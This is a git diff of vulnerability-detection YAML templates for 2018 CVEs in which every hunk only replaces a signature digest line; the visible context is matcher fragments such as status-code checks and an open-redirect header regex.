3bc4a8fee8..4ab33384d7 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201e560854e3534ca384af7afd69273188f6e9d2e3f9bb2e631d76c66c0f8010cb02203b4bbe990a3a655fb6418e675e2573cbf23891cc3345c3ca8b5ac3c8f045cf6a:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220255b472c6431fa837915763b6062f739da744c3f060bcd75fb3dd1719123a05c02200a77ad89b6703b6360478cc1b0f9805d880022e78f0ad1cec0f49926176aa505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index bfde906579..372617e029 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022033a9e4f93ba0264b4422d9af12a1aec06ea50510239614d646960ef5c50031db022100b7fd1a73ed7ede9b3b08e8b69a7f126099c85d67de45dbb10c4a4c071908f0a2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204d7b7f7d33443e96c3bd5c19db70dd1e70d5409e961d4791bfc062e4dac53acd022100aa05969d08a536e0aebc8dea61e185386c6ad49c0d3bb011eef3ee16e7b1403d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 75a9ddc7b3..4e6e3c828a 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100aa1f8d563dcd825e5a9681331414121984d2cc4b30d59739a23c1d6799d884380220583befa2022dcadda2cf65a1758a74ee8d2732f7accf6c7a22423f95d144a390:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022001bf886dd00b72087e60b767c63614cf88e4850c516e789025b6d25ef1b4955702207ef67b2983fc3ac1cbb0b8a2c186c5ac5441e45a70d7bc6ad2cd9014bee0d1bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 2d65945767..ca876c47f3 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f4733481e96af4030595e0d91ae425588905b11aa0e1a80d2a5c6dcdd82d27cb022100f9742f365ebd603ac94ef39eec2dbf1b0c14bf506e98e671554fc4c6b6a4309e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d2b022449da2a38f590cd43639e6eb496f616357eb20cdbbf533fd46840367f502203f978f186ade8b5d7bd85284d9bacb81676a1e6b1c1a2a346b40c64786b62167:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index f215c32887..42d4441fc3 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -68,5 +68,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220491e47d127fec0c8860d6748c31dee6b6f3b5691221b3070bb5a317ae6c19fc7022037590d74d8f89e9d684f4f9bb73d760f105c19801b0a24145d9e8d1fcb32dbb9:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022049490ca7d6c83d0a1083512bbf322fb2ff61a0c8c889a46d59bc32dc966a46a2022044591a84bd59924e7d63a690abd1df41ccdc6e9ca0a98f72a52f6c37a57b660d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index f0012dc346..1d2bf58ac0 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -39,5 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a004830460221009cbb6fa204d9fab2bef81dadecb2387ffe16c3cdb7022a733227266827122487022100a622e2ca224113c4a1c826f56a908b2ae368bef42b6331a80d1a3fec064445b1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022055fb6879a56d01a4521e1cd3d0248352d5158b6f98a82fa9dd71d83e57230d93022100fdd257dfffb518c1381cb172137a9fec4c88974e892634f20066542af9064def:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index a44fff653a..b0368615e2 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -64,5 +64,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205c18ddf95ffc551f8af0be9664fc6f8875a7c449745f58ddcffbaf448dcdf01f022100c4dc7e1799c0670cabfe7b11b9cfae7ef553f354e9c417249cbe2e9d31e539fd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206a7369a40b511b0ad72c822ba0038d6c0156fe4979155e6119f77bb3f2e4b85502210089d5e6a880b560d167399c9017aa9d5a42c4826cf3848ea678d468bd4e0ae238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index 1a73fffc14..edb8a0061f 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022003e1398e0168b606f2a0c217a993c414ea4fa8f3e2dbdaa62579252d694220e90221009cd941f1958974d26f730eeb1683daeaca11361a0bc54fbb569e7b8b1cb0a5e5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fe058931b6b800dc1ed4780fd614e7b6a804570b15eb242fe752c5200656eb820221008b9eab06ce4c92dc22816ee9741466d4160da014628c936f106032b9f37be672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index 274ed24135..01ab997d94 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205d57361a8bf517e95b69934ae158d572875a51d7493fc703dcaffb5f035bda8602207943f6f3b061cc5ee2544a04f399900361038e818fffdc5deb168ba7de34c7fa:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204f390e8ba78a9a6532d8a3b2aabb624f8de7b8be565e4385d284b9b9ecb3dc1a022041764ab1424e79612734e1c7d5060ab5f7570febceeefcf13b68261fcd8dd12a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 11e0d8b200..cf317b0b64 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c937c2880ebeb8ab4a8b49c5a6b6a4c346fa91f83860b6fd21e6986c45342e81022100ae9e53a1ec279ec4afa68fd13bd0711ed8bf5397c3822ed02a60bb66cae3027c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220110fa4fdbd7f1310a391e8f6197b0ce56eee32c1bd010527f943900c60544b97022100ec45ac9f91ee65ef2763da47c5fa06bc982943e8837a4a95dbf1b1d9cd193b4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 97c9b3c187..13336d40bb 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -44,5 +44,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 4a0a00473045022100c6a57ee91c3b30a5d1dc4104b6f368867d1e75eddc27d90d0ccc137e347cec230220646102a87472a6dded6b7a99e0dde2972e8873f4b5798820027234663cc41e58:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220343bf6108efc107b69c3d506e16de12a36ed3583c02292cdfe66a945c6f6eb58022100b495813c6b11d43b3fec529a07c9f9e030132e17fe8b9319f51df2606cbf3542:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 41762eb5e8..54e65e72e5 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220078a25c70e6aec394082287508dc3e44c6967f4c5103e5bdcdecfb2f0000a95602206fe405aa14cc610f73181cb7d1032f71476a0cc712909421bb84e151215f6071:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204e246e53f0ee61e7cfb00c697f4cd33b26e636e20a7b2c6391289eaa0a6a54ae022100808210aa3a256f6e9697e897c0fb7fcf2a6c09c718de7ca7c184ac262ced239a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index c2cefdf2fa..929126cde6 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022038a83452748f98269d48f6af6a964e3e68e62fcf3c2c94aa756be8b2a17623d802204799180130c3e372c4293b7a85d2cad9b6782c1e2abe3f2f5ccaadf6c3a37b38:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d4fffd547c040bb82100425b4581bf0e3ff2621a627e89dc9a1675aeb6c426200220340e663ae31b564b196bc9a32fa4a7c4991f4e67b40ea2a4840894451cd62816:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index 06cac3879f..620d755676 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202ef0a60005868aac93a54b4f9ebabcf323f4de53f2f1c52e04ae4dc0808238ba0221008d9463862f86695163ef0534068d497012e02abaeef2f5ed657a286707781903:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022059e4d95437d265dd2766f58f8cb37b9c6fe0cc5478dd6e1ab173f82326882a18022100b2d6f0e0e16a91e4dab0bc291f223c37c9038125cff329ffc9f1758e35774e88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index d6c76392d2..117cd0a317 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cdc0f18fa6c094f2f092ba7734be1064f075c85241546afe780641a4ce2a9b13022026e1339b99504905ac2716f4eec4e239d8a0f509eb99727f966acd0555616525:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100926c3681d92d534a795432632894ace2bade76f73adf8e262353eefeccdfa4b7022100b44b8b9dea7513e564b12a1f9dcfb4535e9b1212d0809d651992c7139257c99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index b426ed3c7d..b57ec95c64 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -69,5 +69,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body - -# digest: 4b0a00483046022100be81a91262e05a32979f0be76a30b41385f94af82ba2aea5ed2aa89b8c725450022100d94e18a887509e427812db9b938d28088cd726dc2c57b337c5551929ae70396d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210082849f5726997f44eca2c875fe4f6195cd7375c628689622c87599da6c026be0022071b5686bab965c0a3948254fbf80437d289897adaa8a9ff0a7039a0810fac8d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index d0143fed4e..c52a7712e6 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220276031061d6524e6d59da77809d9f275123c413f96262dcdb873b3c54975f3da0220109b3508f42fcb195a1a7b46cf8d2759b0adc2989a8dc73c881a36e2b434855e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204d107fcf01ef3f3fa9431911a80e78302c7fea908a0100623791b1bc21af5210022100a8832786cef8351d65b5beee2ae1071e24c59e2369e7cbb65a5b54ffbd9553e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 0058d97d4d..16d71cab5f 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c83ca1fd96057c0ffede1f8d7de730b9e11dd02aaa3d7c732c8aa0f74a4518c2022100a0d6492e19507a693e27d8e2f163f2825c1a1cc76ff031ed005456d7e1ee3ed2:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022065c09077890f402ad2a39968f0e8f88f9382f042b98fa87a94764d572434c545022009be2c8a093193f99fa8a986b19d84a7b2f12b7092a88fece94023e0c70789e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index e42e63233f..b53a0f953c 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -45,5 +45,4 @@ http: negative: true status: - 404 - -# digest: 4b0a00483046022100b99f1f4b609c8ee637c860c2ccbbadf49793adaa8662151c06273c3b7aed70c902210094543f706d19694abf8ee712dc7888e4c6f3b0e6543a46cce3f4c92085033e08:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a068c35f19023e4c7fe17d31ec3f3079119b916e86c455951a99e41e1032edb5022028aafaa81d80266a80d002ad8240941e08864f90af57b298262601431d92a94a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 229d0c92f8..8d693dc868 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a173dfd50a57c5bfe9a6f0bdd25255103febe2084ec60034794ac049f62a091a022100f2cc3ac8aa07210c5ad91e6f4c67a19f0684bcb83153f847b38c48895b059515:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100984dfb6bc0a7c542ddad854b9d0e6c6a077a8d8a6c68fbd05217ca4e0f26d92e022100a92a82abcf6cc319df341e1424f49ba34fe190510ebac782b71455b1fe292086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 489cb0c185..a14fd444cd 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203c39ab52f948b7050a8ddeba0a8d02ac72cb3c3cd6336ee689480641abe979f90221008d182b00d53f831d062be24c52fb8c92ba76c69eaacc0e93ce5a56e4c51c1c27:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206954e9afa3028819b0738e535dae23cf9ce4c5b0f766051c2ae42427685b4eec022100bb4808125c04f8aac533339d54989eebab6b5ff0313a411fcebc77115ce95602:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index f31d2fbc1c..682c3f1a81 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -40,5 +40,4 @@ http: part: response words: - "calling init: /lib/" - -# digest: 4a0a00473045022100e51be2833725ca8af03b29b62a9849674d20569ab625ca8e8cb42049619070350220505b94a31d140ffd026a441722342792417b34827b960473a0ce6a5180962a37:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203ee517f633b02b360e686eadb74959dc5c3eae1172272356766fb3ee9053b08a02205b672393dd1753984e1d7f7e933b29f51f93627c3aba742d3b5f6b26cd266f62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index fafc4f68d1..4832bb3906 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022050214e77cfa10aeacf1eddf34d690076c0e99daa0c7a4591aa3c7c61d1cd36bf0220196f203c63d04825fae599188665311e80aa92a581dab66a1a31046477d7822b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204a76754136f2c193b6cb11a26d391427d40bd68c050a4414d8859fb1e103c066022100eeab2aae3f56d830631df25bdf5690c0ce1f94e669554ab2e334d0854c4964ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index d631922ab0..bf04c3fd1c 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -45,5 +45,4 @@ http: regex: - '"version": "([0-9.]+)"' part: body - -# digest: 4a0a00473045022100ed80bf3b6b6668d11bc2dfd22a08ecdcdf40b92e753a8473790cb1904f9e2fe202201d987db06c230c44161e27262463efaca4ce0236f08a4f8f9cfdf6fb19bb4354:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220196bf523c933ab59f15e9e3f34ccc80313ebb20f6941b5104bf60326b7a62df00220553e87ecf365fd49efb692cb3242650200ac730c2381d0e25ff331be0f3a9086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 7c2045474a..aed671d4a7 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -34,5 +34,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a004630440220053f38284e4068ff0f60ceffc3a5c7ce7da4e44d1ed28f9e8eaae0447c5935b00220481c43229e9808afb945d0aa563be355e51453d847c419d44a318e3ffd80759d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100de005b845928150292d4676548f30f3cdfa8bdcffb4ce32ecbbf71eabdb69750022100da3f245e1790ff9976294a1867ddfed2dd4e07295c0cd0a16618d82e4b65351d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 8e0b58c17f..cc3364d245 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203f99a3f70b4ef6ec4dc3bd024aac2091c7ac638a2cbd669f1b397f64c8379cb702206ba49392e8d74af8fbf163013a92564ca178e860c094176ca456a3d99eb46721:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206210062406d4438457cb45660905c02f6857904e76d239fed8d55e9a7780daed022100b9aeaf5baa7c61046be461c015a547248db87ce347020231a222c49b0c8f3f6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index b7276877c3..0edc7c9388 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -38,5 +38,4 @@ http: part: body words: - '' - -# digest: 490a0046304402202cda68af8bffdaafab33393bf133fb44d2e98ea3d13dfc87931cccf460217cd102207bd185c09c7fca25fa6b6395de08f3d5ba54307d827ea99a82ef8a96d6189121:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008beb7716114cc1d5af6327a1cf9b5284302ad16dce17b8e6da46e117498439b00221009c5eaa8bd5e878484c2d8f4940e0b74fa20656c8e50fa07cfb9a1bb12c177e70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 9dc33195ba..aa5cfe51c0 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100dd5ad0b35b2592fa3f520f20913b56377403fdcf8e1d8016391c462a54ab48c60221008ec773b946aacc0311435373352872c071a2328ead1f62864bce0b1347042045:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bc88258f4dde6d066a704745b8a6b641e4d0573a9fcc98e75179f390a201906b022100ca0a0790fd6ded8919c3ddaf5a527c6570fddba83e93ecffc312f0cdb677db48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index da0a68cb9f..c2928cf6b5 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220058b00aab65fba1ac70f2643e25afb4d8feb9168cad11659c926f5a96886a98402204ece3e656d80f2a4b271347e48a6c8bd073c51376c862d5481e84438af3aec1a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022047acc977656e48cca60e91c0efd4bf04af50e0ff77a0c97379df0cd93f6f82a902210088fa8d0d5214cfcdae89f4d9b729a27153b1753c1f57c58ea68acb308d8790d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index aeb0432995..f6e5729572 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d1bd11336a1762fce6baca7515fe137852099fa743d6c1da7af16a20900db8280220252525918b939bd2322eec3c697c83e5cd82c3571138a720d92c53d04e3ca445:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fd3c3eb2c00d79972a4b3aa15ffb68fa2aa73afbede009a3462ddca2ea4a38f6022100c7851b4e89190931909d4fa83560fc8b5c81350a09145457d8767bf645ee2d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index b963c571b2..e469923bb3 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e5239f1524174ed7d36fc5096cb2da666034fc06a7252ac42372abdbcaa1c45a022100f2bb91edcfe776cc5760a37d0f88d2f6890c54741e533b2c9eb68a7853d73ff9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e402654329698fa19c2ff9d57926b7084d253bb5092d7b248de05206d7ffe7d9022100e48552a44b551d5d32a1ffb9477ff868fb18d1638a436ee525a26354e2ac01e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 113a5f7d0e..3622fec8ab 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022064dbdee099e274a4ba82e4ba19cb6b2adca4240b5e3bfc47e4edb0a0cfe8702f02210096769d84b5012800f30aaa3f656394141af1ae1aff89792deb22f7a3aaa910a7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f4658ed79578e64c7ae30491326a87cb96322ea2ca37213d0617772224532109022100bc080ec12ace4d16455f5b06a31f31ae479e6cefa6b26e24c70aef98ca378f89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 39082c7623..44c789debe 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -39,5 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100b054595468b24e432482d7729c9285375c74f77ab29ae6176ed824b4e03f183c022100b22ac0d8a204ec99b7694f047df60f145e9feff3ec9badc5efff90ce9000c1ca:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b1788a0a12bb5b2207506c0763da46757620941ef6844c87e0c9e741f7ab9c8a022100d125a519c889b7444597a09a19873644f346cfa43ff19593504ea550abae1f4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index e354b43ca0..23d0dcac5f 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 301 - -# digest: 4b0a00483046022100dda0bbb8b49a20aec6e2c924374046155a7d081c1b963b4a8151db31ae39d03b022100cf3eb79f04c9291b8ec9a278ce93f0c6b0fe1d5974214c0d2c1bf41f196b0696:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f13b60cbbd0b96177a022d2df637ec797d77df23bbc3a5b7b750cf789b1552370220056b0623f9723f9b87d7ab7daccf7b736e2fe564ace6a6749bed374c527434c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index d6b9792331..5ae599a37e 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f72504b98053b49a539444b3332a1c2a6f1c76a96cbb1069b797c00f3f8e5d430220049db9d20d590abe23d983ab9d500e153b72a49b76ea73e314c5c2ee2aa2d8b6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cd75420da14c5e5acb555e607c9158b140ed7e4194238f32abc21608427de5eb022000ba35c700dadb84960885f4db01cb1939fa157478bc10cf65d4aca85b94e180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 9cd7e45b5a..06874401b4 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e1373eb7f21a96a7f64e46ff1e3e5c7fead6a50ce90f1927bdb9c6b0a87787680221009643eb438869f2f81c85259b001ecce03611f84dfe981bc0411bf3b6996be5fc:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220599693783b8984e2364084bf9a16df27c6fab52313e47da4dd22c131a8a9b57002206f99175c59ea6a7d81b7ce68a92575556eed687bf7da5586c3abc7d4f2ee90ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 5da13e9acf..e21a567600 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -34,5 +34,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100e52fa2091a0cd4b7720190ffdbdbe12a17eb524c4a94c53ad2189298e79295230221009148bf7e0fa051973a6f8c8fdfaa841af98bd291497ddd64f52d423f3a75e21c:922c64590222798bb761d5b6d8e72950 +# digest: 